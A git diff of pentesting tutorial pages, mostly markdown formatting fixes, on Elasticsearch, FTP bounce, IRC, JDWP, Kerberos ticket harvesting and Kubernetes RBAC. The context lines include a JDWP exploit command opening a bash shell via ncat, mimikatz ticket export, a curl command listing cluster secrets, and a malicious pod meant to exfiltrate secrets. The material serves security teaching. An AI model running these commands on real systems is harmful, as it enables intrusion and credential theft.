-| /\_cat/fielddata               |                               |                          |
-| /\_cat/health                  |                               |                          |
-| /\_cat/indices                 |                               |                          |
-| /\_cat/master                  |                               |                          |
-| /\_cat/nodeattrs               |                               |                          |
-| /\_cat/nodes                   |                               |                          |
+| \_cat                           | /\_cluster                    | /\_security               |
+| ------------------------------- | ----------------------------- | ------------------------- |
+| /\_cat/segments                 | /\_cluster/allocation/explain | /\_security/user          |
+| /\_cat/shards                   | /\_cluster/settings           | /\_security/privilege     |
+| /\_cat/repositories             | /\_cluster/health             | /\_security/role\_mapping |
+| /\_cat/recovery                 | /\_cluster/state              | /\_security/role          |
+| /\_cat/plugins                  | /\_cluster/stats              | /\_security/api\_key      |
+| /\_cat/pending\_tasks           | /\_cluster/pending\_tasks     |                           |
+| /\_cat/nodes                    | /\_nodes                      |                           |
+| /\_cat/tasks                    | /\_nodes/usage                |                           |
+| /\_cat/templates                | /\_nodes/hot\_threads         |                           |
+| /\_cat/thread\_pool             | /\_nodes/stats                |                           |
+| /\_cat/ml/trained\_models       | /\_tasks                      |                           |
+| /\_cat/transforms/\_all         | /\_remote/info                |                           |
+| /\_cat/aliases                  |                               |                           |
+| /\_cat/allocation               |                               |                           |
+| /\_cat/ml/anomaly\_detectors    |                               |                           |
+| /\_cat/count                    |                               |                           |
+| /\_cat/ml/data\_frame/analytics |                               |                           |
+| /\_cat/ml/datafeeds             |                               |                           |
+| /\_cat/fielddata                |                               |                           |
+| /\_cat/health                   |                               |                           |
+| /\_cat/indices                  |                               |                           |
+| /\_cat/master                   |                               |                           |
+| /\_cat/nodeattrs                |                               |                           |
+| /\_cat/nodes                    |                               |                           |
 
 These endpoints were [**taken from the documentation**](https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html) where you can **find more**.\
 Also, if you access `/_cat` the response will contain the `/_cat/*` endpoints supported by the instance.
 
-In `/_security/user` (if auth enabled) you can see which user has role `superuser`. 
+In `/_security/user` (if auth enabled) you can see which user has role `superuser`.&#x20;
 
 ### Indices
 
@@ -111,19 +111,19 @@ yellow open   bank    eSVpNfCfREyYoVigNWcrMw   5   1       1000            0
 
 ```
 
-To obtain** information about which kind of data is saved inside an index** you can access: `http://host:9200/<index>` from example in this case `http://10.10.10.115:9200/bank`
+To obtain **information about which kind of data is saved inside an index** you can access: `http://host:9200/<index>` from example in this case `http://10.10.10.115:9200/bank`
 
 ![](<../.gitbook/assets/image (265).png>)
 
 ### Dump index
 
-If you want to** dump all the contents** of an index you can access: `http://host:9200/<index>/_search?pretty=true` like `http://10.10.10.115:9200/bank/_search?pretty=true`
+If you want to **dump all the contents** of an index you can access: `http://host:9200/<index>/_search?pretty=true` like `http://10.10.10.115:9200/bank/_search?pretty=true`
 
 ![](<../.gitbook/assets/image (266).png>)
 
 _Take a moment to compare the contents of the each document (entry) inside the bank index and the fields of this index that we saw in the previous section._
 
-So, at this point you may notice that** there is a field called "total" inside "hits"** that indicates that **1000 documents were found** inside this index but only 10 were retried. This is because **by default there is a limit of 10 documents**.\
+So, at this point you may notice that **there is a field called "total" inside "hits"** that indicates that **1000 documents were found** inside this index but only 10 were retried. This is because **by default there is a limit of 10 documents**.\
 But, now that you know that **this index contains 1000 documents**, you can **dump all of them** indicating the number of entries you want to dump in the **`size`** parameter: `http://10.10.10.115:9200/quotes/_search?pretty=true&size=1000`asd\
 _Note: If you indicate bigger number all the entries will be dumped anyway, for example you could indicate `size=9999` and it will be weird if there were more entries (but you should check)._
 
@@ -134,11 +134,11 @@ Remember that in this case the **default limit of 10** results will be applied.
 
 ### Search
 
-If you are looking for some information you can do a** raw search on all the indices** going to `http://host:9200/_search?pretty=true&q=<search_term>` like in `http://10.10.10.115:9200/_search?pretty=true&q=Rockwell`
+If you are looking for some information you can do a **raw search on all the indices** going to `http://host:9200/_search?pretty=true&q=<search_term>` like in `http://10.10.10.115:9200/_search?pretty=true&q=Rockwell`
 
 ![](<../.gitbook/assets/image (267).png>)
 
-If you want just to **search on an index **you can just **specify **it on the **path**: `http://host:9200/<index>/_search?pretty=true&q=<search_term>`
+If you want just to **search on an index** you can just **specify** it on the **path**: `http://host:9200/<index>/_search?pretty=true&q=<search_term>`
 
 _Note that the q parameter used to search content **supports regular expressions**_
 
@@ -158,7 +158,7 @@ curl -X POST '10.10.10.115:9200/bookindex/books' -H 'Content-Type: application/j
  }'
 ```
 
-That cmd will create a **new index **called `bookindex` with a document of type `books` that has the attributes "_bookId_", "_author_", "_publisher_" and "_name_"
+That cmd will create a **new index** called `bookindex` with a document of type `books` that has the attributes "_bookId_", "_author_", "_publisher_" and "_name_"
 
 Notice how the **new index appears now in the list**:
 
diff --git a/pentesting/pentesting-ftp/ftp-bounce-attack.md b/pentesting/pentesting-ftp/ftp-bounce-attack.md
index 7ad6ace1..aa397ec8 100644
--- a/pentesting/pentesting-ftp/ftp-bounce-attack.md
+++ b/pentesting/pentesting-ftp/ftp-bounce-attack.md
@@ -5,14 +5,14 @@
 ### Manual
 
 1. Connect to vulnerable FTP
-2.  Use **`PORT`**or **`EPRT`**(but only 1 of them) to make it establish a connection with the_ \<IP:Port>_ you want to scan:
+2.  Use **`PORT`**or **`EPRT`**(but only 1 of them) to make it establish a connection with the _\<IP:Port>_ you want to scan:
 
     `PORT 172,32,80,80,0,8080`\
     `EPRT |2|172.32.80.80|8080|`
 3. Use **`LIST`**(this will just send to the connected _\<IP:Port>_ the list of current files in the FTP folder) and check for the possible responses: `150 File status okay` (This means the port is open) or `425 No connection established` (This means the port is closed)
-   1. Instead of `LIST `you could also use **`RETR /file/in/ftp`** and look for similar `Open/Close` responses.
+   1. Instead of `LIST` you could also use **`RETR /file/in/ftp`** and look for similar `Open/Close` responses.
 
-Example Using **PORT **(port 8080 of 172.32.80.80 is open and port 7777 is closed):
+Example Using **PORT** (port 8080 of 172.32.80.80 is open and port 7777 is closed):
 
 ![](<../../.gitbook/assets/image (225).png>)
 
@@ -20,7 +20,7 @@ Same example using **`EPRT`**(authentication omitted in the image):
 
 ![](<../../.gitbook/assets/image (226).png>)
 
-Open port using `EPRT` instead of` LIST` (different env)
+Open port using `EPRT` instead of `LIST` (different env)
 
 ![](<../../.gitbook/assets/image (228).png>)
 
diff --git a/pentesting/pentesting-irc.md b/pentesting/pentesting-irc.md
index fe203baf..c4c6c3eb 100644
--- a/pentesting/pentesting-irc.md
+++ b/pentesting/pentesting-irc.md
@@ -2,13 +2,13 @@
 
 ## Basic Information
 
-IRC was **originally a plain text protocol** (although later extended), which on request was assigned port **194/TCP by IANA**. However, the de facto standard has always been to **run IRC on 6667/TCP** and nearby port numbers (for example TCP ports 6660–6669, 7000) to **avoid **having to run the IRCd software with **root privileges**.
+IRC was **originally a plain text protocol** (although later extended), which on request was assigned port **194/TCP by IANA**. However, the de facto standard has always been to **run IRC on 6667/TCP** and nearby port numbers (for example TCP ports 6660–6669, 7000) to **avoid** having to run the IRCd software with **root privileges**.
 
 For connecting to a server it is required merely a **nickname**. Once connection is established, the first thing the server does is a reverse-dns to your ip:
 
-![](https://lh5.googleusercontent.com/C9AbjS9Jn4GvZJ-syptvebGU2jtI4p1UmLsmkBj3--utdFjft1B3Qfij3GDiUqxyp9wq_mbupVdUtfW-\_rSo1W_EPFZzCQ7iHSn7-DK3l4-BfylIHluQBNrDWxO0lxCuAMz8EkQ9oi9jwDlH6A)
+![](https://lh5.googleusercontent.com/C9AbjS9Jn4GvZJ-syptvebGU2jtI4p1UmLsmkBj3--utdFjft1B3Qfij3GDiUqxyp9wq\_mbupVdUtfW-\_rSo1W\_EPFZzCQ7iHSn7-DK3l4-BfylIHluQBNrDWxO0lxCuAMz8EkQ9oi9jwDlH6A)
 
-It seems that overall **there are two kinds of users**: **operators **and ordinary **users**. For logging in as an **operator **it is required a **username **and a **password **(and in many occasions a particular hostname, ip  and even a particular hostmask). Within operators there are different privilege levels wherein the administrator has the highest privilege.
+It seems that overall **there are two kinds of users**: **operators** and ordinary **users**. For logging in as an **operator** it is required a **username** and a **password** (and in many occasions a particular hostname, ip  and even a particular hostmask). Within operators there are different privilege levels wherein the administrator has the highest privilege.
 
 **Default ports:** 194, 6667, 6660-7000
 
@@ -30,7 +30,7 @@ openssl s_client -connect <IP>:<PORT> -quiet
 
 ### Manual
 
-Here you can see how to connect and access the IRC using some **random nickname** and then enumerate some interesting info. You can learn more commands of IRC [here](https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands#USERIP).
+Here you can see how to connect and access the IRC using some **random nickname** and then enumerate some interesting info. You can learn more commands of IRC [here](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP).
 
 ```bash
 #Connection with random nickname
diff --git a/pentesting/pentesting-jdwp-java-debug-wire-protocol.md b/pentesting/pentesting-jdwp-java-debug-wire-protocol.md
index b882c4e5..d94ae2b6 100644
--- a/pentesting/pentesting-jdwp-java-debug-wire-protocol.md
+++ b/pentesting/pentesting-jdwp-java-debug-wire-protocol.md
@@ -10,7 +10,7 @@ You can use the python exploit located in [https://github.com/IOActive/jdwp-shel
 ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept
 ```
 
-I found that the use of` --break-on 'java.lang.String.indexOf'` make the exploit more **stable**. And if you have the change to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.
+I found that the use of `--break-on 'java.lang.String.indexOf'` make the exploit more **stable**. And if you have the change to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.
 
 Normally this debugger is run on port 8000 and if you establish a TCP connection with the port and send "**JDWP-Handshake**", the server should respond you with the same string.\
 Also, you can check this string in the network to find possible JDWP services.
@@ -19,7 +19,7 @@ Listing **processes**, if you find the string "**jdwk**" inside a **java process
 
 ## More details
 
-**Copied from **[**https://ioactive.com/hacking-java-debug-wire-protocol-or-how/**](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)
+**Copied from** [**https://ioactive.com/hacking-java-debug-wire-protocol-or-how/**](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)
 
 ### **Java Debug Wire Protocol**
 
diff --git a/pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md b/pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md
index f1ff641b..bce69e9d 100644
--- a/pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md
+++ b/pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md
@@ -2,26 +2,26 @@
 
 On Linux, **tickets are stored in credential caches or ccaches**. There are 3 main types, which indicate where **tickets can be found:**
 
-* **Files**, by default under** /tmp** directory, in the form of** krb5cc\_%{uid}.**
+* **Files**, by default under **/tmp** directory, in the form of **krb5cc\_%{uid}.**
 * **Kernel Keyrings**, an special space in the Linux kernel provided for storing keys.
 * **Process memory,** used when only one process needs to use the tickets.
 
-To verify what type of storage is used in a specific machine, the variable _**default_ccache_name**_** **must be checked in the **/etc/krb5.conf **file, which by default has read permission to any user. In case of this parameter being missing, its default value is _FILE:/tmp/krb5cc\_%{uid}_.
+To verify what type of storage is used in a specific machine, the variable _**default\_ccache\_name**_** ** must be checked in the **/etc/krb5.conf** file, which by default has read permission to any user. In case of this parameter being missing, its default value is _FILE:/tmp/krb5cc\_%{uid}_.
 
-In order to extract** tickets from the other 2 sources** (keyrings and processes), a great paper, [**Kerberos Credential Thievery (GNU/Linux)**](https://www.delaat.net/rp/2016-2017/p97/report.pdf), released in 2017, explains ways of recovering the tickets from them.
+In order to extract **tickets from the other 2 sources** (keyrings and processes), a great paper, [**Kerberos Credential Thievery (GNU/Linux)**](https://www.delaat.net/rp/2016-2017/p97/report.pdf), released in 2017, explains ways of recovering the tickets from them.
 
 #### Keyring - From the paper
 
-> The** Linux kernel** has a feature called **keyrings**. This is an **area of memory residing** within the kernel that is used to **manage and retain keys**.
+> The **Linux kernel** has a feature called **keyrings**. This is an **area of memory residing** within the kernel that is used to **manage and retain keys**.
 >
 > The **keyctl system call** was introduced in kernel version 2.6.10 5 . This provides **user space applications an API** which can be used to interact with kernel keyrings.
 
-> The** name of the keyring** in use can be parsed from the** Kerberos configuration file /etc/krb5.conf** which has read permission enable for anybody (octal 644) by default. An attacker can then leverage this information to **search for ticket **11 containing keyrings and extract the tickets. A proof of concept script that implements this functionality can be seen in Section A.2 **(hercules.sh)**. In a keyring the ccache is stored as components. As seen in Figure 2, a file ccache is made up of 3 distinct components: header, default principal, and a sequence of credentials. A** keyring holds the default principal and credentials**. This script will dump these components to separate files. Then using an** attacker synthesised header **these pieces are combined in the correct order to** rebuild a file ccache**. This rebuilt file can then be exfiltrated to an attacker machine and then used to impersonate a Kerberos user. A simple program for generating a valid ccache header can be seen in Section A.3.
+> The **name of the keyring** in use can be parsed from the **Kerberos configuration file /etc/krb5.conf** which has read permission enable for anybody (octal 644) by default. An attacker can then leverage this information to **search for ticket** 11 containing keyrings and extract the tickets. A proof of concept script that implements this functionality can be seen in Section A.2 **(hercules.sh)**. In a keyring the ccache is stored as components. As seen in Figure 2, a file ccache is made up of 3 distinct components: header, default principal, and a sequence of credentials. A **keyring holds the default principal and credentials**. This script will dump these components to separate files. Then using an **attacker synthesised header** these pieces are combined in the correct order to **rebuild a file ccache**. This rebuilt file can then be exfiltrated to an attacker machine and then used to impersonate a Kerberos user. A simple program for generating a valid ccache header can be seen in Section A.3.
 
-Based on the **heracles.sh script **(from the paper) a C tool you can use (created by the author of the complete post) is [**tickey**](https://github.com/TarlogicSecurity/tickey)**,  and it extracts tickets from keyrings:**
+Based on the **heracles.sh script** (from the paper) a C tool you can use (created by the author of the complete post) is [**tickey**](https://github.com/TarlogicSecurity/tickey)**,  and it extracts tickets from keyrings:**
 
 ```
 /tmp/tickey -i
 ```
 
-**This information was taken from: **[**https://www.tarlogic.com/en/blog/how-to-attack-kerberos/**](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)****
+**This information was taken from:** [**https://www.tarlogic.com/en/blog/how-to-attack-kerberos/**](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)****
diff --git a/pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md b/pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
index 0734de62..09e9375f 100644
--- a/pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
+++ b/pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
@@ -1,6 +1,6 @@
 # Harvesting tickets from Windows
 
-In Windows, tickets are **handled and stored by the lsass** (Local Security Authority Subsystem Service) process, which is responsible for security. Hence, to retrieve tickets from a Windows system, it is necessary to **communicate with lsass and ask for them**. As a **non-administrative user only owned tickets can be fetched**, however, as machine **administrator**, **all **of them can be harvested. For this purpose, the tools **Mimikatz or Rubeus** can be used as shown below:
+In Windows, tickets are **handled and stored by the lsass** (Local Security Authority Subsystem Service) process, which is responsible for security. Hence, to retrieve tickets from a Windows system, it is necessary to **communicate with lsass and ask for them**. As a **non-administrative user only owned tickets can be fetched**, however, as machine **administrator**, **all** of them can be harvested. For this purpose, the tools **Mimikatz or Rubeus** can be used as shown below:
 
 ```
 mimikatz # sekurlsa::tickets /export
diff --git a/pentesting/pentesting-kubernetes/README.md b/pentesting/pentesting-kubernetes/README.md
index b4697ffc..df3befb2 100644
--- a/pentesting/pentesting-kubernetes/README.md
+++ b/pentesting/pentesting-kubernetes/README.md
@@ -1,6 +1,6 @@
 # Pentesting Kubernetes
 
-**The original author of this page is** [**Jorge**](https://www.linkedin.com/in/jorge-belmonte-a924b616b/)** (read his original post **[**here**](https://sickrov.github.io)**)**
+**The original author of this page is** [**Jorge**](https://www.linkedin.com/in/jorge-belmonte-a924b616b/) **(read his original post** [**here**](https://sickrov.github.io)**)**
 
 ## Architecture & Basics
 
@@ -18,9 +18,9 @@
 ![](https://sickrov.github.io/media/Screenshot-68.jpg)
 
 * **Node**: operating system with pod or pods.
-  * **Pod**: Wrapper around a container or multiple containers with. A pod should only contain one application (so usually, a pod run just 1 container). The pod is the way kubernetes abstracts the container technology running. 
-    * **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The** service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement **(with a different internal IP) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service. \
-      When a **service** is **created** you can find the endpoints of each service running` kubectl get endpoints`
+  * **Pod**: Wrapper around a container or multiple containers with. A pod should only contain one application (so usually, a pod run just 1 container). The pod is the way kubernetes abstracts the container technology running.&#x20;
+    * **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** (with a different internal IP) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service. \
+      When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints`
 
 ![](<../../.gitbook/assets/image (467) (1).png>)
 
@@ -31,7 +31,7 @@
   * **Api Server:** Is the way the users and the pods use to communicate with the master process. Only authenticated request should be allowed.
   * **Scheduler**: Scheduling refers to making sure that Pods are matched to Nodes so that Kubelet can run them. It has enough intelligence to decide which node has more available resources the assign the new pod to it. Note that the scheduler doesn't start new pods, it just communicate with the Kubelet process running inside the node, which will launch the new pod.
   * **Kube Controller manager**: It checks resources like replica sets or deployments to check if, for example, the correct number of pods or nodes are running. In case a pod is missing, it will communicate with the scheduler to start a new one. It controls replication, tokens, and account services to the API.
-  * **etcd**: Data storage, persistent, consistent, and distributed. Is Kubernetes’s database and the key-value storage where it keeps the complete state of the clusters (each change is logged here). Components like the Scheduler or the Controller manager depends on this date to know which changes have occurred (available resourced of the nodes, number of pods running...) 
+  * **etcd**: Data storage, persistent, consistent, and distributed. Is Kubernetes’s database and the key-value storage where it keeps the complete state of the clusters (each change is logged here). Components like the Scheduler or the Controller manager depends on this date to know which changes have occurred (available resourced of the nodes, number of pods running...)&#x20;
 * **Cloud controller manager**: Is the specific controller for flow controls and applications, i.e: if you have clusters in AWS or OpenStack.
 
 Note that as the might be several nodes (running several pods), there might also be several master processes which their access to the Api server load balanced and their etcd synchronized.
@@ -46,8 +46,8 @@ When a pod creates data that shouldn't be lost when the pod disappear it should
 * **Secret**: This is the place to **store secret data** like passwords, API keys... encoded in B64. The pod will be able to access this data to use the required credentials.
 * **Deployments**: This is where the components to be run by kubernetes are indicated. A user usually won't work directly with pods, pods are abstracted in **ReplicaSets** (number of same pods replicated), which are run via deployments. Note that deployments are for **stateless** applications. The minimum configuration for a deployment is the name and the image to run.
 * **StatefulSet**: This component is meant specifically for applications like **databases** which needs to **access the same storage**.
-* **Ingress**: This is the configuration that is use to** expose the application publicly with an URL**. Note that this can also be done using external services, but this is the correct way to expose the application.
-  * If you implement an Ingress you will need to create **Ingress Controllers**. The Ingress Controller is a **pod** that will be the endpoint that will receive the requests and check and will load balance them to the services. the ingress controller will **send the request based on the ingress rules configured**. Note that the ingress rules can point to different paths or even subdomains to different internal kubernetes services. 
+* **Ingress**: This is the configuration that is use to **expose the application publicly with an URL**. Note that this can also be done using external services, but this is the correct way to expose the application.
+  * If you implement an Ingress you will need to create **Ingress Controllers**. The Ingress Controller is a **pod** that will be the endpoint that will receive the requests and check and will load balance them to the services. the ingress controller will **send the request based on the ingress rules configured**. Note that the ingress rules can point to different paths or even subdomains to different internal kubernetes services.&#x20;
     * A better security practice would be to use a cloud load balancer or a proxy server as entrypoint to don't have any part of the Kubernetes cluster exposed.
     * When request that doesn't match any ingress rule is received, the ingress controller will direct it to the "**Default backend**". You can `describe` the ingress controller to get the address of this parameter.
     * `minikube addons enable ingress`
@@ -342,7 +342,7 @@ kubectl config set-context --current --namespace=<insert-namespace-name-here>
 
 ### Helm
 
-Helm is the **package manager **for Kubernetes. It allows to package YAML files and distribute them in public and private repositories. These packages are called **Helm Charts**.
+Helm is the **package manager** for Kubernetes. It allows to package YAML files and distribute them in public and private repositories. These packages are called **Helm Charts**.
 
 ```
 helm search <keyword>
@@ -401,7 +401,7 @@ There are different types of secrets in Kubernetes
 
 ![](https://sickrov.github.io/media/Screenshot-164.jpg)
 
-The following configuration file defines a **secret** called `mysecret` with 2 key-value pairs `username: YWRtaW4=` and `password: MWYyZDFlMmU2N2Rm`. It also defines a **pod** called `secretpod` that will have the `username` and `password` defined in `mysecret` exposed in the **environment variables** `SECRET_USERNAME`_ _and_ _`SECRET_PASSWOR`. It will also **mount** the `username` secret inside `mysecret` in the path `/etc/foo/my-group/my-username` with `0640` permissions.
+The following configuration file defines a **secret** called `mysecret` with 2 key-value pairs `username: YWRtaW4=` and `password: MWYyZDFlMmU2N2Rm`. It also defines a **pod** called `secretpod` that will have the `username` and `password` defined in `mysecret` exposed in the **environment variables** `SECRET_USERNAME` __ and __ `SECRET_PASSWOR`. It will also **mount** the `username` secret inside `mysecret` in the path `/etc/foo/my-group/my-username` with `0640` permissions.
 
 {% code title="secretpod.yaml" %}
 ```yaml
@@ -455,7 +455,7 @@ kubectl exec -it  secretpod -- bash
 env | grep SECRET && cat /etc/foo/my-group/my-username && echo
 ```
 
-### Secrets in etcd <a href="discover-secrets-in-etcd" id="discover-secrets-in-etcd"></a>
+### Secrets in etcd <a href="#discover-secrets-in-etcd" id="discover-secrets-in-etcd"></a>
 
 **etcd** is a consistent and highly-available **key-value store** used as Kubernetes backing store for all cluster data. Let’s access to the secrets stored in etcd:
 
@@ -481,7 +481,7 @@ ETCDCTL_API=3 etcdctl --cert /etc/kubernetes/pki/apiserver-etcd-client.crt --key
 
 #### Adding encryption to the ETCD
 
-By default all the secrets are** stored in plain** text inside etcd unless you apply an encryption layer. The following example is based on [https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/](https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/)
+By default all the secrets are **stored in plain** text inside etcd unless you apply an encryption layer. The following example is based on [https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/](https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/)
 
 {% code title="encryption.yaml" %}
 ```yaml
@@ -559,7 +559,7 @@ kubectl get secrets --all-namespaces -o json | kubectl replace -f -
 * Try not to keep secrets in the FS, get them from other places.
 * Check out [https://www.vaultproject.io/](https://www.vaultproject.io) for add more protection to your secrets.
 * [https://kubernetes.io/docs/concepts/configuration/secret/#risks](https://kubernetes.io/docs/concepts/configuration/secret/#risks)
-* [https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes_deployApplicationsConjur-k8s-Secrets.htm](https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes_deployApplicationsConjur-k8s-Secrets.htm)
+* [https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes\_deployApplicationsConjur-k8s-Secrets.htm](https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes\_deployApplicationsConjur-k8s-Secrets.htm)
 
 ## RBAC Hardening
 
@@ -654,17 +654,17 @@ roleRef:
 
 RBAC’s permission is built from three individual parts:
 
-1. **Role\ClusterRole ­– **The actual permission. It contains _**rules**_ that represent a set of permissions. Each rule contains [resources](https://kubernetes.io/docs/reference/kubectl/overview/#resource-types) and [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb). The verb is the action that will apply on the resource.
-2. **Subject (User, Group or ServiceAccount) – **The object that will receive the permissions.
-3. **RoleBinding\ClusterRoleBinding – **The connection between Role\ClusterRole and the subject.
+1. **Role\ClusterRole ­–** The actual permission. It contains _**rules**_ that represent a set of permissions. Each rule contains [resources](https://kubernetes.io/docs/reference/kubectl/overview/#resource-types) and [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb). The verb is the action that will apply on the resource.
+2. **Subject (User, Group or ServiceAccount) –** The object that will receive the permissions.
+3. **RoleBinding\ClusterRoleBinding –** The connection between Role\ClusterRole and the subject.
 
 This is what it will look like in a real cluster:
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/rolebiding_serviceaccount_and_role-1024x551.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/rolebiding\_serviceaccount\_and\_role-1024x551.png)
 
 “**Fine-grained** role bindings **provide greater security**, but **require more effort to administrate**."
 
-From **Kubernetes** 1.6 onwards, **RBAC** policies are **enabled by default**.** **But to enable RBAC you can use something like:
+From **Kubernetes** 1.6 onwards, **RBAC** policies are **enabled by default**. **** But to enable RBAC you can use something like:
 
 ```
 kube-apiserver --authorization-mode=Example,RBAC --other-options --more-options
@@ -753,7 +753,7 @@ You should update your Kubernetes environment as frequently as necessary to have
 
 ****[**Release cycles**](https://kubernetes.io/docs/setup/release/version-skew-policy/): Each 3 months there is a new minor release -- 1.20.3 = 1(Major).20(Minor).3(patch)
 
-**The best way to update a Kubernetes Cluster is (from **[**here**](https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/)**):**
+**The best way to update a Kubernetes Cluster is (from** [**here**](https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/)**):**
 
 * Upgrade the Master Node components following this sequence:
   * etcd (all instances).
diff --git a/pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md b/pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md
index 5aeb07fb..b86b184b 100644
--- a/pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md
+++ b/pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md
@@ -23,7 +23,7 @@ rules:
 Giving a user permission to **access any resource can be very risky**. But, **which verbs** allow access to these resources? Here are some dangerous RBAC permissions that can damage the whole cluster:
 
 * **resources: \["\*"] verbs: \["create"]** – This privilege can **create any resource** in the cluster, such as **pods**, roles, etc. An attacker might abuse it to **escalate privileges**. An example of this can be found in the **“Pods Creation” section**.
-* **resources: \["\*"] verbs: \["list"]** – The ability to list any resource can be used to **leak other users’ secrets **and might make it easier to **escalate privileges**. An example of this is located in the **“Listing secrets” section.**
+* **resources: \["\*"] verbs: \["list"]** – The ability to list any resource can be used to **leak other users’ secrets** and might make it easier to **escalate privileges**. An example of this is located in the **“Listing secrets” section.**
 * **resources: \["\*"] verbs: \["get"]-** This privilege can be used to **get secrets from other service accounts**.
 
 ```yaml
@@ -42,9 +42,9 @@ rules:
 
 The **listing secrets privilege** is a strong capability to have in the cluster. A user with the permission to list secrets can **potentially view all the secrets in the cluster – including the admin keys**. The secret key is a JWT token encoded in base64.
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/listing_secrets_role.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/listing\_secrets\_role.png)
 
-An attacker that gains **access to **_**list secrets**_** **in the cluster can use the following _curl_ commands to get all secrets in “kube-system” namespace:
+An attacker that gains **access to **_**list secrets**_** ** in the cluster can use the following _curl_ commands to get all secrets in “kube-system” namespace:
 
 ```bash
 curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
@@ -58,13 +58,13 @@ An attacker with permission to create a pod in the “kube-system” namespace c
 
 ![](<../../.gitbook/assets/image (463).png>)
 
-Here we have a default privileged account named _bootstrap-signer _with permissions to list all secrets.
+Here we have a default privileged account named _bootstrap-signer_ with permissions to list all secrets.
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/rolebinding_with_cluster_admin_clusterrole-1024x545.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/rolebinding\_with\_cluster\_admin\_clusterrole-1024x545.png)
 
 The attacker can create a malicious pod that will use the privileged service. Then, abusing the service token, it will ex-filtrate the secrets:
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/pods_yaml_with_autoamountServiceAccountToken-1024x345.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/pods\_yaml\_with\_autoamountServiceAccountToken-1024x345.png)
 
 ```yaml
 piVersion: v1
@@ -83,7 +83,7 @@ spec:
   hostNetwork: true
 ```
 
-In the previous image note how the _bootstrap-signer service is used in _`serviceAccountname`_._
+In the previous image note how the _bootstrap-signer service is used in_ `serviceAccountname`_._
 
 So just create the malicious pod and expect the secrets in port 6666:
 
@@ -127,7 +127,7 @@ And capturing the reverse shell you can find the `/etc` directory of the node mo
 
 Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs are all privileges that allow the creation of different tasks in the cluster. Moreover, it's possible can use all of them to **develop pods and even create pods**. So it's possible to a**buse them to escalate privileges just like in the previous example.**
 
-Suppose we have the **permission to create a Daemonset **and we create the following YAML file. This YAML file is configured to do the same steps we mentioned in the “create pods” section.
+Suppose we have the **permission to create a Daemonset** and we create the following YAML file. This YAML file is configured to do the same steps we mentioned in the “create pods” section.
 
 ```yaml
 apiVersion: apps/v1
@@ -178,9 +178,9 @@ Note that as you can get inside any pod, you can abuse other pods token just lik
 
 The privilege to create Rolebindings allows a user to **bind roles to a service account**. This privilege can potentially lead to privilege escalation because it **allows the user to bind admin privileges to a compromised service account.**
 
-The following ClusterRole is using the special verb _bind_ that allows a user to create a RoleBinding with _admin _ClusterRole (default high privileged role) and to add any user, including itself, to this admin ClusterRole.
+The following ClusterRole is using the special verb _bind_ that allows a user to create a RoleBinding with _admin_ ClusterRole (default high privileged role) and to add any user, including itself, to this admin ClusterRole.
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/clusterRole_with_bind_verb.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/clusterRole\_with\_bind\_verb.png)
 
